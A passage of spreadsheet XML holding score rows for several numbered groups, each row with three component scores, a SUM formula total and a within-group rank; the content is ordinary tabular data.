      <c r="A51" s="8" t="n">
        <v>4100032</v>
      </c>
      <c r="B51" s="8" t="n">
        <v>1314010425</v>
      </c>
      <c r="C51" s="8" t="s">
        <v>94</v>
      </c>
      <c r="D51" s="8" t="s">
        <v>92</v>
      </c>
      <c r="E51" s="8" t="n">
        <v>68</v>
      </c>
      <c r="F51" s="8" t="n">
        <v>61.6</v>
      </c>
      <c r="G51" s="8" t="n">
        <v>8</v>
      </c>
      <c r="H51" s="8" t="n">
        <f aca="false">SUM(E51:G51)</f>
        <v>137.6</v>
      </c>
      <c r="I51" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="52" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A52" s="8" t="n">
        <v>4100032</v>
      </c>
      <c r="B52" s="8" t="n">
        <v>1314010428</v>
      </c>
      <c r="C52" s="8" t="s">
        <v>94</v>
      </c>
      <c r="D52" s="8" t="s">
        <v>92</v>
      </c>
      <c r="E52" s="8" t="n">
        <v>55</v>
      </c>
      <c r="F52" s="8" t="n">
        <v>56.6</v>
      </c>
      <c r="G52" s="8" t="n">
        <v>25.5</v>
      </c>
      <c r="H52" s="8" t="n">
        <f aca="false">SUM(E52:G52)</f>
        <v>137.1</v>
      </c>
      <c r="I52" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="53" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A53" s="8" t="n">
        <v>4100032</v>
      </c>
      <c r="B53" s="8" t="n">
        <v>1314010427</v>
      </c>
      <c r="C53" s="8" t="s">
        <v>94</v>
      </c>
      <c r="D53" s="8" t="s">
        <v>92</v>
      </c>
      <c r="E53" s="8" t="n">
        <v>49</v>
      </c>
      <c r="F53" s="8" t="n">
        <v>49.2</v>
      </c>
      <c r="G53" s="8" t="n">
        <v>37.5</v>
      </c>
      <c r="H53" s="8" t="n">
        <f aca="false">SUM(E53:G53)</f>
        <v>135.7</v>
      </c>
      <c r="I53" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="54" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A54" s="8" t="n">
        <v>4100032</v>
      </c>
      <c r="B54" s="8" t="n">
        <v>1314010429</v>
      </c>
      <c r="C54" s="8" t="s">
        <v>94</v>
      </c>
      <c r="D54" s="8" t="s">
        <v>92</v>
      </c>
      <c r="E54" s="8" t="n">
        <v>63</v>
      </c>
      <c r="F54" s="8" t="n">
        <v>55.8</v>
      </c>
      <c r="G54" s="8" t="n">
        <v>2</v>
      </c>
      <c r="H54" s="8" t="n">
        <f aca="false">SUM(E54:G54)</f>
        <v>120.8</v>
      </c>
      <c r="I54" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="55" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A55" s="8" t="n">
        <v>4100032</v>
      </c>
      <c r="B55" s="8" t="n">
        <v>1314010426</v>
      </c>
      <c r="C55" s="8" t="s">
        <v>94</v>
      </c>
      <c r="D55" s="8" t="s">
        <v>92</v>
      </c>
      <c r="E55" s="8" t="n">
        <v>53.8</v>
      </c>
      <c r="F55" s="8" t="n">
        <v>57.4</v>
      </c>
      <c r="G55" s="8" t="n">
        <v>9.5</v>
      </c>
      <c r="H55" s="8" t="n">
        <f aca="false">SUM(E55:G55)</f>
        <v>120.7</v>
      </c>
      <c r="I55" s="8" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="56" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A56" s="8" t="n">
        <v>4100032</v>
      </c>
      <c r="B56" s="8" t="n">
        <v>1314010501</v>
      </c>
      <c r="C56" s="8" t="s">
        <v>94</v>
      </c>
      <c r="D56" s="8" t="s">
        <v>92</v>
      </c>
      <c r="E56" s="8" t="n">
        <v>43.4</v>
      </c>
      <c r="F56" s="8" t="n">
        <v>47.2</v>
      </c>
      <c r="G56" s="8" t="n">
        <v>19.5</v>
      </c>
      <c r="H56" s="8" t="n">
        <f aca="false">SUM(E56:G56)</f>
        <v>110.1</v>
      </c>
      <c r="I56" s="8" t="n">
        <v>6</v>
      </c>
    </row>
    <row r="57" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A57" s="8" t="n">
        <v>4100032</v>
      </c>
      <c r="B57" s="8" t="n">
        <v>1314010430</v>
      </c>
      <c r="C57" s="8" t="s">
        <v>94</v>
      </c>
      <c r="D57" s="8" t="s">
        <v>92</v>
      </c>
      <c r="E57" s="8" t="n">
        <v>53.8</v>
      </c>
      <c r="F57" s="8" t="n">
        <v>54</v>
      </c>
      <c r="G57" s="8"/>
      <c r="H57" s="8" t="n">
        <f aca="false">SUM(E57:G57)</f>
        <v>107.8</v>
      </c>
      <c r="I57" s="8" t="n">
        <v>7</v>
      </c>
    </row>
    <row r="58" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A58" s="8" t="n">
        <v>4100032</v>
      </c>
      <c r="B58" s="8" t="n">
        <v>1314010424</v>
      </c>
      <c r="C58" s="8" t="s">
        <v>94</v>
      </c>
      <c r="D58" s="8" t="s">
        <v>92</v>
      </c>
      <c r="E58" s="8" t="n">
        <v>45</v>
      </c>
      <c r="F58" s="8" t="n">
        <v>39.4</v>
      </c>
      <c r="G58" s="8" t="n">
        <v>5</v>
      </c>
      <c r="H58" s="8" t="n">
        <f aca="false">SUM(E58:G58)</f>
        <v>89.4</v>
      </c>
      <c r="I58" s="8" t="n">
        <v>8</v>
      </c>
    </row>
    <row r="59" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A59" s="8" t="n">
        <v>4100033</v>
      </c>
      <c r="B59" s="8" t="n">
        <v>1314010510</v>
      </c>
      <c r="C59" s="8" t="s">
        <v>95</v>
      </c>
      <c r="D59" s="8" t="s">
        <v>92</v>
      </c>
      <c r="E59" s="8" t="n">
        <v>69.8</v>
      </c>
      <c r="F59" s="8" t="n">
        <v>58.2</v>
      </c>
      <c r="G59" s="8" t="n">
        <v>6.5</v>
      </c>
      <c r="H59" s="8" t="n">
        <f aca="false">SUM(E59:G59)</f>
        <v>134.5</v>
      </c>
      <c r="I59" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="60" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A60" s="8" t="n">
        <v>4100033</v>
      </c>
      <c r="B60" s="8" t="n">
        <v>1314010507</v>
      </c>
      <c r="C60" s="8" t="s">
        <v>95</v>
      </c>
      <c r="D60" s="8" t="s">
        <v>92</v>
      </c>
      <c r="E60" s="8" t="n">
        <v>66.6</v>
      </c>
      <c r="F60" s="8" t="n">
        <v>52.2</v>
      </c>
      <c r="G60" s="8" t="n">
        <v>14.5</v>
      </c>
      <c r="H60" s="8" t="n">
        <f aca="false">SUM(E60:G60)</f>
        <v>133.3</v>
      </c>
      <c r="I60" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="61" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A61" s="8" t="n">
        <v>4100033</v>
      </c>
      <c r="B61" s="8" t="n">
        <v>1314010511</v>
      </c>
      <c r="C61" s="8" t="s">
        <v>95</v>
      </c>
      <c r="D61" s="8" t="s">
        <v>92</v>
      </c>
      <c r="E61" s="8" t="n">
        <v>59</v>
      </c>
      <c r="F61" s="8" t="n">
        <v>58</v>
      </c>
      <c r="G61" s="8" t="n">
        <v>16</v>
      </c>
      <c r="H61" s="8" t="n">
        <f aca="false">SUM(E61:G61)</f>
        <v>133</v>
      </c>
      <c r="I61" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="62" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A62" s="8" t="n">
        <v>4100033</v>
      </c>
      <c r="B62" s="8" t="n">
        <v>1314010512</v>
      </c>
      <c r="C62" s="8" t="s">
        <v>95</v>
      </c>
      <c r="D62" s="8" t="s">
        <v>92</v>
      </c>
      <c r="E62" s="8" t="n">
        <v>56.4</v>
      </c>
      <c r="F62" s="8" t="n">
        <v>55.4</v>
      </c>
      <c r="G62" s="8" t="n">
        <v>8</v>
      </c>
      <c r="H62" s="8" t="n">
        <f aca="false">SUM(E62:G62)</f>
        <v>119.8</v>
      </c>
      <c r="I62" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="63" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A63" s="8" t="n">
        <v>4100033</v>
      </c>
      <c r="B63" s="8" t="n">
        <v>1314010502</v>
      </c>
      <c r="C63" s="8" t="s">
        <v>95</v>
      </c>
      <c r="D63" s="8" t="s">
        <v>92</v>
      </c>
      <c r="E63" s="8" t="n">
        <v>50.4</v>
      </c>
      <c r="F63" s="8" t="n">
        <v>56.2</v>
      </c>
      <c r="G63" s="8" t="n">
        <v>13</v>
      </c>
      <c r="H63" s="8" t="n">
        <f aca="false">SUM(E63:G63)</f>
        <v>119.6</v>
      </c>
      <c r="I63" s="8" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="64" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A64" s="8" t="n">
        <v>4100033</v>
      </c>
      <c r="B64" s="8" t="n">
        <v>1314010504</v>
      </c>
      <c r="C64" s="8" t="s">
        <v>95</v>
      </c>
      <c r="D64" s="8" t="s">
        <v>92</v>
      </c>
      <c r="E64" s="8" t="n">
        <v>42.4</v>
      </c>
      <c r="F64" s="8" t="n">
        <v>45.4</v>
      </c>
      <c r="G64" s="8" t="n">
        <v>30</v>
      </c>
      <c r="H64" s="8" t="n">
        <f aca="false">SUM(E64:G64)</f>
        <v>117.8</v>
      </c>
      <c r="I64" s="8" t="n">
        <v>6</v>
      </c>
    </row>
    <row r="65" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A65" s="8" t="n">
        <v>4100033</v>
      </c>
      <c r="B65" s="8" t="n">
        <v>1314010503</v>
      </c>
      <c r="C65" s="8" t="s">
        <v>95</v>
      </c>
      <c r="D65" s="8" t="s">
        <v>92</v>
      </c>
      <c r="E65" s="8" t="n">
        <v>56.6</v>
      </c>
      <c r="F65" s="8" t="n">
        <v>56.6</v>
      </c>
      <c r="G65" s="8" t="n">
        <v>4</v>
      </c>
      <c r="H65" s="8" t="n">
        <f aca="false">SUM(E65:G65)</f>
        <v>117.2</v>
      </c>
      <c r="I65" s="8" t="n">
        <v>7</v>
      </c>
    </row>
    <row r="66" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A66" s="8" t="n">
        <v>4100033</v>
      </c>
      <c r="B66" s="8" t="n">
        <v>1314010514</v>
      </c>
      <c r="C66" s="8" t="s">
        <v>95</v>
      </c>
      <c r="D66" s="8" t="s">
        <v>92</v>
      </c>
      <c r="E66" s="8" t="n">
        <v>56.2</v>
      </c>
      <c r="F66" s="8" t="n">
        <v>52.4</v>
      </c>
      <c r="G66" s="8" t="n">
        <v>8</v>
      </c>
      <c r="H66" s="8" t="n">
        <f aca="false">SUM(E66:G66)</f>
        <v>116.6</v>
      </c>
      <c r="I66" s="8" t="n">
        <v>8</v>
      </c>
    </row>
    <row r="67" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A67" s="8" t="n">
        <v>4100033</v>
      </c>
      <c r="B67" s="8" t="n">
        <v>1314010508</v>
      </c>
      <c r="C67" s="8" t="s">
        <v>95</v>
      </c>
      <c r="D67" s="8" t="s">
        <v>92</v>
      </c>
      <c r="E67" s="8" t="n">
        <v>55.8</v>
      </c>
      <c r="F67" s="8" t="n">
        <v>57.6</v>
      </c>
      <c r="G67" s="8" t="n">
        <v>3</v>
      </c>
      <c r="H67" s="8" t="n">
        <f aca="false">SUM(E67:G67)</f>
        <v>116.4</v>
      </c>
      <c r="I67" s="8" t="n">
        <v>9</v>
      </c>
    </row>
    <row r="68" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A68" s="8" t="n">
        <v>4100033</v>
      </c>
      <c r="B68" s="8" t="n">
        <v>1314010505</v>
      </c>
      <c r="C68" s="8" t="s">
        <v>95</v>
      </c>
      <c r="D68" s="8" t="s">
        <v>92</v>
      </c>
      <c r="E68" s="8" t="n">
        <v>53.2</v>
      </c>
      <c r="F68" s="8" t="n">
        <v>54.8</v>
      </c>
      <c r="G68" s="8" t="n">
        <v>1</v>
      </c>
      <c r="H68" s="8" t="n">
        <f aca="false">SUM(E68:G68)</f>
        <v>109</v>
      </c>
      <c r="I68" s="8" t="n">
        <v>10</v>
      </c>
    </row>
    <row r="69" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A69" s="8" t="n">
        <v>4100033</v>
      </c>
      <c r="B69" s="8" t="n">
        <v>1314010506</v>
      </c>
      <c r="C69" s="8" t="s">
        <v>95</v>
      </c>
      <c r="D69" s="8" t="s">
        <v>92</v>
      </c>
      <c r="E69" s="8" t="n">
        <v>47.8</v>
      </c>
      <c r="F69" s="8" t="n">
        <v>50.2</v>
      </c>
      <c r="G69" s="8" t="n">
        <v>2</v>
      </c>
      <c r="H69" s="8" t="n">
        <f aca="false">SUM(E69:G69)</f>
        <v>100</v>
      </c>
      <c r="I69" s="8" t="n">
        <v>11</v>
      </c>
    </row>
    <row r="70" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A70" s="8" t="n">
        <v>4100033</v>
      </c>
      <c r="B70" s="8" t="n">
        <v>1314010513</v>
      </c>
      <c r="C70" s="8" t="s">
        <v>95</v>
      </c>
      <c r="D70" s="8" t="s">
        <v>92</v>
      </c>
      <c r="E70" s="8" t="n">
        <v>39</v>
      </c>
      <c r="F70" s="8" t="n">
        <v>51.8</v>
      </c>
      <c r="G70" s="8"/>
      <c r="H70" s="8" t="n">
        <f aca="false">SUM(E70:G70)</f>
        <v>90.8</v>
      </c>
      <c r="I70" s="8" t="n">
        <v>12</v>
      </c>
    </row>
    <row r="71" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A71" s="8" t="n">
        <v>4100033</v>
      </c>
      <c r="B71" s="8" t="n">
        <v>1314010509</v>
      </c>
      <c r="C71" s="8" t="s">
        <v>95</v>
      </c>
      <c r="D71" s="8" t="s">
        <v>92</v>
      </c>
      <c r="E71" s="8" t="n">
        <v>42</v>
      </c>
      <c r="F71" s="8" t="n">
        <v>41.2</v>
      </c>
      <c r="G71" s="8" t="n">
        <v>2</v>
      </c>
      <c r="H71" s="8" t="n">
        <f aca="false">SUM(E71:G71)</f>
        <v>85.2</v>
      </c>
      <c r="I71" s="8" t="n">
        <v>13</v>
      </c>
    </row>
    <row r="72" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A72" s="8" t="n">
        <v>4100034</v>
      </c>
      <c r="B72" s="8" t="n">
        <v>1314010517</v>
      </c>
      <c r="C72" s="8" t="s">
        <v>96</v>
      </c>
      <c r="D72" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E72" s="8" t="n">
        <v>57.4</v>
      </c>
      <c r="F72" s="8" t="n">
        <v>70.8</v>
      </c>
      <c r="G72" s="8"/>
      <c r="H72" s="8" t="n">
        <f aca="false">SUM(E72:G72)</f>
        <v>128.2</v>
      </c>
      <c r="I72" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="73" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A73" s="8" t="n">
        <v>4100034</v>
      </c>
      <c r="B73" s="8" t="n">
        <v>1314010523</v>
      </c>
      <c r="C73" s="8" t="s">
        <v>96</v>
      </c>
      <c r="D73" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E73" s="8" t="n">
        <v>59.4</v>
      </c>
      <c r="F73" s="8" t="n">
        <v>62.2</v>
      </c>
      <c r="G73" s="8"/>
      <c r="H73" s="8" t="n">
        <f aca="false">SUM(E73:G73)</f>
        <v>121.6</v>
      </c>
      <c r="I73" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="74" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A74" s="8" t="n">
        <v>4100034</v>
      </c>
      <c r="B74" s="8" t="n">
        <v>1314010528</v>
      </c>
      <c r="C74" s="8" t="s">
        <v>96</v>
      </c>
      <c r="D74" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E74" s="8" t="n">
        <v>62.6</v>
      </c>
      <c r="F74" s="8" t="n">
        <v>58</v>
      </c>
      <c r="G74" s="8"/>
      <c r="H74" s="8" t="n">
        <f aca="false">SUM(E74:G74)</f>
        <v>120.6</v>
      </c>
      <c r="I74" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="75" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A75" s="8" t="n">
        <v>4100034</v>
      </c>
      <c r="B75" s="8" t="n">
        <v>1314010518</v>
      </c>
      <c r="C75" s="8" t="s">
        <v>96</v>
      </c>
      <c r="D75" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E75" s="8" t="n">
        <v>58</v>
      </c>
      <c r="F75" s="8" t="n">
        <v>49.6</v>
      </c>
      <c r="G75" s="8"/>
      <c r="H75" s="8" t="n">
        <f aca="false">SUM(E75:G75)</f>
        <v>107.6</v>
      </c>
      <c r="I75" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="76" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A76" s="8" t="n">
        <v>4100034</v>
      </c>
      <c r="B76" s="8" t="n">
        <v>1314010519</v>
      </c>
      <c r="C76" s="8" t="s">
        <v>96</v>
      </c>
      <c r="D76" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E76" s="8" t="n">
        <v>60</v>
      </c>
      <c r="F76" s="8" t="n">
        <v>45</v>
      </c>
      <c r="G76" s="8"/>
      <c r="H76" s="8" t="n">
        <f aca="false">SUM(E76:G76)</f>
        <v>105</v>
      </c>
      <c r="I76" s="8" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="77" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A77" s="8" t="n">
        <v>4100034</v>
      </c>
      <c r="B77" s="8" t="n">
        <v>1314010521</v>
      </c>
      <c r="C77" s="8" t="s">
        <v>96</v>
      </c>
      <c r="D77" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E77" s="8" t="n">
        <v>47.6</v>
      </c>
      <c r="F77" s="8" t="n">
        <v>56.6</v>
      </c>
      <c r="G77" s="8"/>
      <c r="H77" s="8" t="n">
        <f aca="false">SUM(E77:G77)</f>
        <v>104.2</v>
      </c>
      <c r="I77" s="8" t="n">
        <v>6</v>
      </c>
    </row>
    <row r="78" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A78" s="8" t="n">
        <v>4100034</v>
      </c>
      <c r="B78" s="8" t="n">
        <v>1314010526</v>
      </c>
      <c r="C78" s="8" t="s">
        <v>96</v>
      </c>
      <c r="D78" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E78" s="8" t="n">
        <v>53.6</v>
      </c>
      <c r="F78" s="8" t="n">
        <v>49.8</v>
      </c>
      <c r="G78" s="8"/>
      <c r="H78" s="8" t="n">
        <f aca="false">SUM(E78:G78)</f>
        <v>103.4</v>
      </c>
      <c r="I78" s="8" t="n">
        <v>7</v>
      </c>
    </row>
    <row r="79" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A79" s="8" t="n">
        <v>4100034</v>
      </c>
      <c r="B79" s="8" t="n">
        <v>1314010529</v>
      </c>
      <c r="C79" s="8" t="s">
        <v>96</v>
      </c>
      <c r="D79" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E79" s="8" t="n">
        <v>56.4</v>
      </c>
      <c r="F79" s="8" t="n">
        <v>46.2</v>
      </c>
      <c r="G79" s="8"/>
      <c r="H79" s="8" t="n">
        <f aca="false">SUM(E79:G79)</f>
        <v>102.6</v>
      </c>
      <c r="I79" s="8" t="n">
        <v>8</v>
      </c>
    </row>
    <row r="80" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A80" s="8" t="n">
        <v>4100034</v>
      </c>
      <c r="B80" s="8" t="n">
        <v>1314010516</v>
      </c>
      <c r="C80" s="8" t="s">
        <v>96</v>
      </c>
      <c r="D80" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E80" s="8" t="n">
        <v>50.2</v>
      </c>
      <c r="F80" s="8" t="n">
        <v>52.2</v>
      </c>
      <c r="G80" s="8"/>
      <c r="H80" s="8" t="n">
        <f aca="false">SUM(E80:G80)</f>
        <v>102.4</v>
      </c>
      <c r="I80" s="8" t="n">
        <v>9</v>
      </c>
    </row>
    <row r="81" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A81" s="8" t="n">
        <v>4100034</v>
      </c>
      <c r="B81" s="8" t="n">
        <v>1314010520</v>
      </c>
      <c r="C81" s="8" t="s">
        <v>96</v>
      </c>
      <c r="D81" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E81" s="8" t="n">
        <v>46.8</v>
      </c>
      <c r="F81" s="8" t="n">
        <v>54.2</v>
      </c>
      <c r="G81" s="8"/>
      <c r="H81" s="8" t="n">
        <f aca="false">SUM(E81:G81)</f>
        <v>101</v>
      </c>
      <c r="I81" s="8" t="n">
        <v>10</v>
      </c>
    </row>
    <row r="82" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A82" s="8" t="n">
        <v>4100034</v>
      </c>
      <c r="B82" s="8" t="n">
        <v>1314010524</v>
      </c>
      <c r="C82" s="8" t="s">
        <v>96</v>
      </c>
      <c r="D82" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E82" s="8" t="n">
        <v>44.6</v>
      </c>
      <c r="F82" s="8" t="n">
        <v>55.8</v>
      </c>
      <c r="G82" s="8"/>
      <c r="H82" s="8" t="n">
        <f aca="false">SUM(E82:G82)</f>
        <v>100.4</v>
      </c>
      <c r="I82" s="8" t="n">
        <v>11</v>
      </c>
    </row>
    <row r="83" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A83" s="8" t="n">
        <v>4100034</v>
      </c>
      <c r="B83" s="8" t="n">
        <v>1314010527</v>
      </c>
      <c r="C83" s="8" t="s">
        <v>96</v>
      </c>
      <c r="D83" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E83" s="8" t="n">
        <v>49.4</v>
      </c>
      <c r="F83" s="8" t="n">
        <v>50</v>
      </c>
      <c r="G83" s="8"/>
      <c r="H83" s="8" t="n">
        <f aca="false">SUM(E83:G83)</f>
        <v>99.4</v>
      </c>
      <c r="I83" s="8" t="n">
        <v>12</v>
      </c>
    </row>
    <row r="84" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A84" s="8" t="n">
        <v>4100034</v>
      </c>
      <c r="B84" s="8" t="n">
        <v>1314010522</v>
      </c>
      <c r="C84" s="8" t="s">
        <v>96</v>
      </c>
      <c r="D84" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E84" s="8" t="n">
        <v>44.8</v>
      </c>
      <c r="F84" s="8" t="n">
        <v>53.6</v>
      </c>
      <c r="G84" s="8"/>
      <c r="H84" s="8" t="n">
        <f aca="false">SUM(E84:G84)</f>
        <v>98.4</v>
      </c>
      <c r="I84" s="8" t="n">
        <v>13</v>
      </c>
    </row>
    <row r="85" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A85" s="8" t="n">
        <v>4100034</v>
      </c>
      <c r="B85" s="8" t="n">
        <v>1314010525</v>
      </c>
      <c r="C85" s="8" t="s">
        <v>96</v>
      </c>
      <c r="D85" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E85" s="8" t="n">
        <v>38.6</v>
      </c>
      <c r="F85" s="8" t="n">
        <v>55.6</v>
      </c>
      <c r="G85" s="8"/>
      <c r="H85" s="8" t="n">
        <f aca="false">SUM(E85:G85)</f>
        <v>94.2</v>
      </c>
      <c r="I85" s="8" t="n">
        <v>14</v>
      </c>
    </row>
    <row r="86" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A86" s="8" t="n">
        <v>4100034</v>
      </c>
      <c r="B86" s="8" t="n">
        <v>1314010515</v>
      </c>
      <c r="C86" s="8" t="s">
        <v>96</v>
      </c>
      <c r="D86" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E86" s="8" t="n">
        <v>40.4</v>
      </c>
      <c r="F86" s="8" t="n">
        <v>38.8</v>
      </c>
      <c r="G86" s="8"/>
      <c r="H86" s="8" t="n">
        <f aca="false">SUM(E86:G86)</f>
        <v>79.2</v>
      </c>
      <c r="I86" s="8" t="n">
        <v>15</v>
      </c>
    </row>
    <row r="87" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A87" s="8" t="n">
        <v>4100035</v>
      </c>
      <c r="B87" s="8" t="n">
        <v>1314010601</v>
      </c>
      <c r="C87" s="8" t="s">
        <v>98</v>
      </c>
      <c r="D87" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E87" s="8" t="n">
        <v>58.6</v>
      </c>
      <c r="F87" s="8" t="n">
        <v>63</v>
      </c>
      <c r="G87" s="8"/>
      <c r="H87" s="8" t="n">
        <f aca="false">SUM(E87:G87)</f>
        <v>121.6</v>
      </c>
      <c r="I87" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="88" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A88" s="8" t="n">
        <v>4100035</v>
      </c>
      <c r="B88" s="8" t="n">
        <v>1314010602</v>
      </c>
      <c r="C88" s="8" t="s">
        <v>98</v>
      </c>
      <c r="D88" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E88" s="8" t="n">
        <v>61.8</v>
      </c>
      <c r="F88" s="8" t="n">
        <v>58</v>
      </c>
      <c r="G88" s="8"/>
      <c r="H88" s="8" t="n">
        <f aca="false">SUM(E88:G88)</f>
        <v>119.8</v>
      </c>
      <c r="I88" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="89" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A89" s="8" t="n">
        <v>4100035</v>
      </c>
      <c r="B89" s="8" t="n">
        <v>1314010604</v>
      </c>
      <c r="C89" s="8" t="s">
        <v>98</v>
      </c>
      <c r="D89" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E89" s="8" t="n">
        <v>53</v>
      </c>
      <c r="F89" s="8" t="n">
        <v>62.4</v>
      </c>
      <c r="G89" s="8"/>
      <c r="H89" s="8" t="n">
        <f aca="false">SUM(E89:G89)</f>
        <v>115.4</v>
      </c>
      <c r="I89" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="90" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A90" s="8" t="n">
        <v>4100035</v>
      </c>
      <c r="B90" s="8" t="n">
        <v>1314010530</v>
      </c>
      <c r="C90" s="8" t="s">
        <v>98</v>
      </c>
      <c r="D90" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E90" s="8" t="n">
        <v>55.2</v>
      </c>
      <c r="F90" s="8" t="n">
        <v>51.6</v>
      </c>
      <c r="G90" s="8"/>
      <c r="H90" s="8" t="n">
        <f aca="false">SUM(E90:G90)</f>
        <v>106.8</v>
      </c>
      <c r="I90" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="91" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A91" s="8" t="n">
        <v>4100035</v>
      </c>
      <c r="B91" s="8" t="n">
        <v>1314010603</v>
      </c>
      <c r="C91" s="8" t="s">
        <v>98</v>
      </c>
      <c r="D91" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E91" s="8" t="n">
        <v>49.6</v>
      </c>
      <c r="F91" s="8" t="n">
        <v>48.2</v>
      </c>
      <c r="G91" s="8"/>
      <c r="H91" s="8" t="n">
        <f aca="false">SUM(E91:G91)</f>
        <v>97.8</v>
      </c>
      <c r="I91" s="8" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="92" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A92" s="8" t="n">
        <v>4100036</v>
      </c>
      <c r="B92" s="8" t="n">
        <v>1314010608</v>
      </c>
      <c r="C92" s="8" t="s">
        <v>99</v>
      </c>
      <c r="D92" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E92" s="8" t="n">
        <v>64</v>
      </c>
      <c r="F92" s="8" t="n">
        <v>61.6</v>
      </c>
      <c r="G92" s="8"/>
      <c r="H92" s="8" t="n">
        <f aca="false">SUM(E92:G92)</f>
        <v>125.6</v>
      </c>
      <c r="I92" s="8" t="n">
        <v>1</v>
      </c>
